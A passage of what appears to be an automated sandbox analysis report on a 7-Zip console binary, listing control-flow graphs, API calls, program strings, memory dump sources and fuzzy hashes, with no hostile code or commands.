b75a17-b75a1d 2181->2191 2182->2164 2192 b75a32-b75a52 2182->2192 2187 b75e1c 2183->2187 2188 b75e3a-b75e77 free call b74610 free * 2 2183->2188 2193 b75b63-b75b7e 2184->2193 2194 b75b80 2184->2194 2195 b75d9e 2185->2195 2196 b75dbc-b75df9 free call b74610 free * 2 2185->2196 2186->2151 2197 b75e20-b75e38 free 2187->2197 2188->2099 2189->2155 2190->2189 2199 b75917-b7591f 2190->2199 2191->2182 2192->2157 2200 b75b88-b75bb6 2193->2200 2194->2200 2201 b75da2-b75dba free 2195->2201 2196->2099 2197->2188 2197->2197 2199->2189 2204 b75e7c-b75e95 free 2200->2204 2205 b75bbc-b75bd6 free 2200->2205 2201->2196 2201->2201 2207 b75e97 2204->2207 2208 b75eb5-b75ef4 free call b74610 free * 2 2204->2208 2209 b75bff-b75c12 free call b74610 2205->2209 2210 b75bd8-b75bdc 2205->2210 2215 b75e9b-b75eb3 free 2207->2215 2208->2099 2218 b75c17-b75c35 free 2209->2218 2211 b75bde-b75bf5 free 2210->2211 2211->2211 2217 b75bf7 2211->2217 2215->2208 2215->2215 2217->2209 2218->2087
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrow$memset
                                                                                                                                                                                                        • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                                                        • API String ID: 4182836161-2069749860
                                                                                                                                                                                                        • Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                        • Instruction ID: f365a8b7a3d68475c53e8fb17772a750f15770a2d128ea2c3a37c3ddd68f509b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54522C33209AC186CA30DB25E4847AEB7A4F786B91F4451A2DFAD63B25DF78C855CB40
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
                                                                                                                                                                                                        • Instruction ID: 025112911ec3d6e52967839db1db13d7c8491c720c0babaa86d71c96edbf169d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4426F3720AA8486CB24EF25D0907AF77E5F386B88F5550A6EB5E57B25CF38C449CB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Only one archive can be created with rename command, xrefs: 00B617E1
                                                                                                                                                                                                        • Unsupported -spf:, xrefs: 00B60F7E
                                                                                                                                                                                                        • I won't write compressed data to a terminal, xrefs: 00B61741
                                                                                                                                                                                                        • Cannot find archive name, xrefs: 00B6110A
                                                                                                                                                                                                        • Unsupported command:, xrefs: 00B60E57
                                                                                                                                                                                                        • -ai switch is not supported for this command, xrefs: 00B615C3
                                                                                                                                                                                                        • Archive name cannot by empty, xrefs: 00B61151
                                                                                                                                                                                                        • Incorrect Number of benmchmark iterations, xrefs: 00B61847
                                                                                                                                                                                                        • Cannot use absolute pathnames for this command, xrefs: 00B6138C
                                                                                                                                                                                                        • stdout mode and email mode cannot be combined, xrefs: 00B61710
                                                                                                                                                                                                        • I won't write data and program's messages to same stream, xrefs: 00B614B3, 00B61782
                                                                                                                                                                                                        • The command must be specified, xrefs: 00B60DF5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrow$free$wcscmp
                                                                                                                                                                                                        • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                                                                                        • API String ID: 1252877886-1892825451
                                                                                                                                                                                                        • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                        • Instruction ID: d051200b10157a0ef9cc55ddbf3e70b6fb24280682e7b31b271e9e4576e86587
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A52E3773086C1A7DB28DF39D1903AEBBA1F355784F888496DB9903B12DB79D5A8C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                        • String ID: SeSecurityPrivilege
                                                                                                                                                                                                        • API String ID: 1313864721-2333288578
                                                                                                                                                                                                        • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                        • Instruction ID: 91103ad25b4fe7b58b1e271cf8c399666a31d3240d991accdf1593a517f51e3f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F115172205B45C2DA00DF16F95437DB3A6FBC4B95F984422EA8B82A64CF3CC459CB10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B5AC84
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 00B5AC95
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32 ref: 00B5ACA9
                                                                                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,00B5F928), ref: 00B5ACE0
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,00B5F928), ref: 00B5ACEA
                                                                                                                                                                                                        • CloseHandle.KERNELBASE ref: 00B5ACFA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3398352648-0
                                                                                                                                                                                                        • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                        • Instruction ID: 4d07eb11542d89aefcf9c89fd4b73fd9af684b5867474976ae59bae2d3ba56f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15014C6261468287DB108FA4F8847AA73A1F784B96F545136EB8A92A54CF3CC89DCB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B5794C: FindClose.KERNELBASE ref: 00B5795E
                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE ref: 00B579BA
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE ref: 00B579FA
                                                                                                                                                                                                        • free.MSVCRT ref: 00B57A08
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2921071498-0
                                                                                                                                                                                                        • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                        • Instruction ID: e403e57fadb2e0fac44a55a84d83c96e1fe3f809f40a2dccb978655a6ba9cb61
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24210C37208A8096DB11DF24F45036D63A1F78A7B9F545391EEA9477D9DF38CA09C740
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                        • API String ID: 0-2438533581
                                                                                                                                                                                                        • Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                        • Instruction ID: 009013fcf4016895c50e2add95d5654b64df3d986da652037c359de4394463bf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC035132249E8082CA35DB25E4907AFB7A1F786BC0F545192DB9E57B25DF7DC889CB00

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1016 b9950d-b99510 1017 b99a40-b99a8e call b52130 1016->1017 1018 b99516-b99529 call b5ed74 1016->1018 1028 b99a90-b99aa0 call b53314 1017->1028 1029 b99aa2 1017->1029 1024 b9952f-b99537 1018->1024 1025 b99820-b99828 1018->1025 1030 b99539-b99541 1024->1030 1031 b99557-b995d5 call b93230 call b53208 1024->1031 1026 b9982e-b9983f call b978a8 1025->1026 1027 b999e4-b999ee 1025->1027 1048 b9984c-b9994d call b96990 call b52bc8 call b77880 call b52bc8 call b52cdc call b96c04 1026->1048 1049 b99841-b99845 1026->1049 1034 b99a20-b99a3f _CxxThrowException 1027->1034 1035 b999f0-b99a1b call b52300 fputs * 2 call b52300 1027->1035 1032 b99aa5-b99ac8 call b5b8f0 call b52130 1028->1032 1029->1032 1030->1031 1038 b99543-b99552 call b53518 1030->1038 1056 b995e5 1031->1056 1057 b995d7-b995df 1031->1057 1059 b99aca-b99ada call b53314 1032->1059 1060 b99adc 1032->1060 1034->1017 1035->1034 1038->1031 1101 b9994f 1048->1101 1102 b99980-b999df free * 5 call b96a20 1048->1102 1049->1048 1062 b995e8-b99631 call b53404 call b9780c 1056->1062 1057->1056 1061 b995e1-b995e3 1057->1061 1065 b99adf-b99c8b call b5b8f0 call b52130 1059->1065 1060->1065 1061->1062 1079 b9963e-b9964d 1062->1079 1080 b99633-b99637 1062->1080 1089 b99c9a 1065->1089 1090 b99c8d-b99c98 call b97414 1065->1090 1081 b9964f-b99657 1079->1081 1082 b99663 1079->1082 1080->1079 1081->1082 1086 b99659-b99661 1081->1086 1087 b9966b-b9972c call b53404 call b96990 call b52bc8 1082->1087 1086->1087 1117 b9972f call b899b8 1087->1117 1094 b99c9d-b99ca8 1089->1094 1090->1094 1098 b99caa-b99cb3 1094->1098 1099 b99cb4-b99d77 call b53404 1094->1099 1098->1099 1115 b99d79-b99d7d 1099->1115 1116 b99d83-b99e8a call b971ec call b53404 call b5ef70 call b53208 call b76be0 1099->1116 1106 b99953-b99969 1101->1106 1113 b9a5ad-b9a5b5 1102->1113 1111 b9997b-b9997e 1106->1111 1112 b9996b-b99976 free * 2 1106->1112 1111->1102 1111->1106 1112->1111 1118 b9a5c5-b9a5c8 1113->1118 1119 b9a5b7-b9a5be 1113->1119 1115->1116 1159 b99e8c-b99eb4 call b76e08 1116->1159 1160 b99ed2-b99f44 call b75458 1116->1160 1123 b99734-b9973f 1117->1123 1121 b9a5ca-b9a5e6 _CxxThrowException 1118->1121 1122 b9a5e7-b9a603 free 1118->1122 1119->1118 1124 b9a5c0 1119->1124 1121->1122 1127 b9a605 1122->1127 1128 b9a626-b9a637 free call b7a13c 1122->1128 1129 b99741-b9974b call b9b1c8 1123->1129 1130 b99750-b99798 call b96c04 1123->1130 1131 b9a5c0 call b966a8 1124->1131 1133 b9a609-b9a624 free 1127->1133 1139 b9a63c-b9a675 call b97080 call b5182c call b97f50 1128->1139 1129->1130 1140 b997cb-b9981b free * 3 call b96a20 free call b9b310 1130->1140 1141 b9979a 1130->1141 1131->1118 1133->1128 1133->1133 1164 b9a6a8-b9a6c9 free 1139->1164 1165 b9a677 1139->1165 1140->1113 1144 b9979e-b997b4 1141->1144 1148 b997c6-b997c9 1144->1148 1149 b997b6-b997c1 free * 2 1144->1149 1148->1140 1148->1144 1149->1148 1159->1160 1170 b99eb6-b99ed1 _CxxThrowException 1159->1170 1168 b99f49-b99f53 1160->1168 1169 b9a67b-b9a691 1165->1169 1171 b99f60-b99f68 1168->1171 1172 b99f55-b99f5b call b9b1c8 1168->1172 1173 b9a6a3-b9a6a6 1169->1173 1174 b9a693-b9a69e free * 2 1169->1174 1170->1160 1176 b99f6a-b99f74 1171->1176 1177 b99fbd-b99fca 1171->1177 1172->1171 1173->1164 1173->1169 1174->1173 1178 b99fb1-b99fb9 1176->1178 1179 b99f76-b99fac call b52300 fputs call b52300 call b52320 call b52300 1176->1179 1180 b9a02c-b9a033 1177->1180 1181 b99fcc-b99fcf call b52300 1177->1181 1178->1177 1179->1178 1183 b9a063-b9a06a 1180->1183 1184 b9a035-b9a03a 1180->1184 1190 b99fd4-b99fdc 1181->1190 1188 b9a06c-b9a071 1183->1188 1189 b9a09e-b9a0a1 1183->1189 1184->1183 1187 b9a03c-b9a05e fputs call b526a0 call b52300 1184->1187 1187->1183 1191 b9a114-b9a11b 1188->1191 1192 b9a077-b9a099 fputs call b526a0 call b52300 1188->1192 1189->1191 1194 b9a0a3-b9a0aa 1189->1194 1190->1180 1193 b99fde-b9a027 fputs call b526a0 call b52300 fputs call b526a0 call b52300 1190->1193 1199 b9a11d-b9a122 1191->1199 1200 b9a15c-b9a15f 1191->1200 1192->1189 1193->1180 1201 b9a0ac-b9a0ce fputs call b526a0 call b52300 1194->1201 1202 b9a0d3-b9a0da 1194->1202 1207 b9a161 1199->1207 1208 b9a124-b9a133 call b52300 1199->1208 1200->1207 1212 b9a16c-b9a16f 1200->1212 1201->1202 1202->1191 1211 b9a0dc-b9a0eb call b52300 1202->1211 1207->1212 1208->1207 1233 b9a135-b9a157 fputs call b526a0 call b52300 1208->1233 1211->1191 1234 b9a0ed-b9a10f fputs call b526a0 call b52300 1211->1234 1220 b9a320-b9a50a free * 2 call b76b58 free call b97968 1212->1220 1221 b9a175-b9a17c 1212->1221 1265 b9a53d-b9a559 free 1220->1265 1266 b9a50c 1220->1266 1228 b9a182-b9a189 1221->1228 1229 b9a2e7-b9a2f6 call b52300 1221->1229 1228->1229 1230 b9a18f-b9a192 1228->1230 1229->1220 1247 b9a2f8-b9a31f fputs call b526a0 call b52300 1229->1247 1230->1220 1237 b9a198-b9a1a3 1230->1237 1233->1200 1234->1191 1244 b9a1d5-b9a1de 1237->1244 1245 b9a1a5-b9a1cd fputs call b526a0 call b52300 1237->1245 1251 b9a1e0-b9a1e3 1244->1251 1252 b9a1f3-b9a223 fputs call b526a0 call b52300 1244->1252 1245->1244 1247->1220 1251->1252 1257 b9a1e5-b9a1ed 1251->1257 1262 b9a275-b9a2c3 fputs call b526a0 call b52300 fputs call b526a0 call b52300 1252->1262 1280 b9a225-b9a270 fputs call b526a0 call b52300 fputs call b526a0 call b52300 1252->1280 1257->1252 1257->1262 1292 b9a2c8-b9a2cb 1262->1292 1272 b9a55b 1265->1272 1273 b9a58c-b9a599 free 1265->1273 1271 b9a510-b9a526 1266->1271 1276 b9a538-b9a53b 1271->1276 1277 b9a528-b9a533 free * 2 1271->1277 1278 b9a55f-b9a575 1272->1278 1273->1113 1276->1265 1276->1271 1277->1276 1282 b9a587-b9a58a 1278->1282 1283 b9a577-b9a582 free * 2 1278->1283 1280->1262 1282->1273 1282->1278 1283->1282 1292->1220 1293 b9a2cd-b9a2e5 call b52300 call b9291c 1292->1293 1293->1220
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                        • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                        • API String ID: 1639683984-435538426
                                                                                                                                                                                                        • Opcode ID: 0bba5815698ffe19a5e1efa49293ddbd27b3fdb07db2a727c2502226ce748b33
                                                                                                                                                                                                        • Instruction ID: f98f1b2482a875a559a6be02195a5db61cb8f044223b7f8f47a411dc29423e1c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bba5815698ffe19a5e1efa49293ddbd27b3fdb07db2a727c2502226ce748b33
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D72697230AAC195CE74EB25E8903EEB3E0F786B80F4441A6DA9D43B19DF38C559CB45

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1833 b99b5d-b99b5f 1834 b99b79-b99c1f call b9057c call b53208 call b738e8 free 1833->1834 1835 b99b61-b99b74 fputs call b52300 1833->1835 1843 b99c21-b99c2b call b9b1c8 1834->1843 1844 b99c30-b99c33 1834->1844 1835->1834 1843->1844 1846 b99c35-b99c3c 1844->1846 1847 b99c54-b99c8b call b9b310 call b52130 1844->1847 1846->1847 1848 b99c3e-b99c4e call b90994 1846->1848 1857 b99c9a 1847->1857 1858 b99c8d-b99c98 call b97414 1847->1858 1852 b99c53 1848->1852 1852->1847 1860 b99c9d-b99ca8 1857->1860 1858->1860 1862 b99caa-b99cb3 1860->1862 1863 b99cb4-b99d77 call b53404 1860->1863 1862->1863 1867 b99d79-b99d7d 1863->1867 1868 b99d83-b99e8a call b971ec call b53404 call b5ef70 call b53208 call b76be0 1863->1868 1867->1868 1879 b99e8c-b99eb4 call b76e08 1868->1879 1880 b99ed2-b99f53 call b75458 1868->1880 1879->1880 1885 b99eb6-b99ed1 _CxxThrowException 1879->1885 1886 b99f60-b99f68 1880->1886 1887 b99f55-b99f5b call b9b1c8 1880->1887 1885->1880 1889 b99f6a-b99f74 1886->1889 1890 b99fbd-b99fca 1886->1890 1887->1886 1891 b99fb1-b99fb9 1889->1891 1892 b99f76-b99fac call b52300 fputs call b52300 call b52320 call b52300 1889->1892 1893 b9a02c-b9a033 1890->1893 1894 b99fcc-b99fcf call b52300 1890->1894 1891->1890 1892->1891 1896 b9a063-b9a06a 1893->1896 1897 b9a035-b9a03a 1893->1897 1903 b99fd4-b99fdc 1894->1903 1901 b9a06c-b9a071 1896->1901 1902 b9a09e-b9a0a1 1896->1902 1897->1896 1900 b9a03c-b9a05e fputs call b526a0 call b52300 1897->1900 1900->1896 1904 b9a114-b9a11b 1901->1904 1905 b9a077-b9a099 fputs call b526a0 call b52300 1901->1905 1902->1904 1907 b9a0a3-b9a0aa 1902->1907 1903->1893 1906 b99fde-b9a027 fputs call b526a0 call b52300 fputs call b526a0 call b52300 1903->1906 1912 b9a11d-b9a122 1904->1912 1913 b9a15c-b9a15f 1904->1913 1905->1902 1906->1893 1914 b9a0ac-b9a0ce fputs call b526a0 call b52300 1907->1914 1915 b9a0d3-b9a0da 1907->1915 1920 b9a161 1912->1920 1921 b9a124-b9a133 call b52300 1912->1921 1913->1920 1925 b9a16c-b9a16f 1913->1925 1914->1915 1915->1904 1924 b9a0dc-b9a0eb call b52300 1915->1924 1920->1925 1921->1920 1946 b9a135-b9a157 fputs call b526a0 call b52300 1921->1946 1924->1904 1947 b9a0ed-b9a10f fputs call b526a0 call b52300 1924->1947 1933 b9a320-b9a50a free * 2 call b76b58 free call b97968 1925->1933 1934 b9a175-b9a17c 1925->1934 1978 b9a53d-b9a559 free 1933->1978 1979 b9a50c 1933->1979 1941 b9a182-b9a189 1934->1941 1942 b9a2e7-b9a2f6 call b52300 1934->1942 1941->1942 1943 b9a18f-b9a192 1941->1943 1942->1933 1960 b9a2f8-b9a31f fputs call b526a0 call b52300 1942->1960 1943->1933 1950 b9a198-b9a1a3 1943->1950 1946->1913 1947->1904 1957 b9a1d5-b9a1de 1950->1957 1958 b9a1a5-b9a1cd fputs call b526a0 call b52300 1950->1958 1964 b9a1e0-b9a1e3 1957->1964 1965 b9a1f3-b9a223 fputs call b526a0 call b52300 1957->1965 1958->1957 1960->1933 1964->1965 1970 b9a1e5-b9a1ed 1964->1970 1975 b9a275-b9a2c3 fputs call b526a0 call b52300 fputs call b526a0 call b52300 1965->1975 1994 b9a225-b9a270 fputs call b526a0 call b52300 fputs call b526a0 call b52300 1965->1994 1970->1965 1970->1975 2017 b9a2c8-b9a2cb 1975->2017 1985 b9a55b 1978->1985 1986 b9a58c-b9a5b5 free 1978->1986 1984 b9a510-b9a526 1979->1984 1989 b9a538-b9a53b 1984->1989 1990 b9a528-b9a533 free * 2 1984->1990 1991 b9a55f-b9a575 1985->1991 1999 b9a5c5-b9a5c8 1986->1999 2000 b9a5b7-b9a5be 1986->2000 1989->1978 1989->1984 1990->1989 1996 b9a587-b9a58a 1991->1996 1997 b9a577-b9a582 free * 2 1991->1997 1994->1975 1996->1986 1996->1991 1997->1996 2001 b9a5ca-b9a5e6 _CxxThrowException 1999->2001 2002 b9a5e7-b9a603 free 1999->2002 2000->1999 2005 b9a5c0 call b966a8 2000->2005 2001->2002 2006 b9a605 2002->2006 2007 b9a626-b9a637 free call b7a13c 2002->2007 2005->1999 2011 b9a609-b9a624 free 2006->2011 2016 b9a63c-b9a675 call b97080 call b5182c call b97f50 2007->2016 2011->2007 2011->2011 2031 b9a6a8-b9a6c9 free 2016->2031 2032 b9a677 2016->2032 2017->1933 2018 b9a2cd-b9a2e5 call b52300 call b9291c 2017->2018 2018->1933 2034 b9a67b-b9a691 2032->2034 2035 b9a6a3-b9a6a6 2034->2035 2036 b9a693-b9a69e free * 2 2034->2036 2035->2031 2035->2034 2036->2035
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
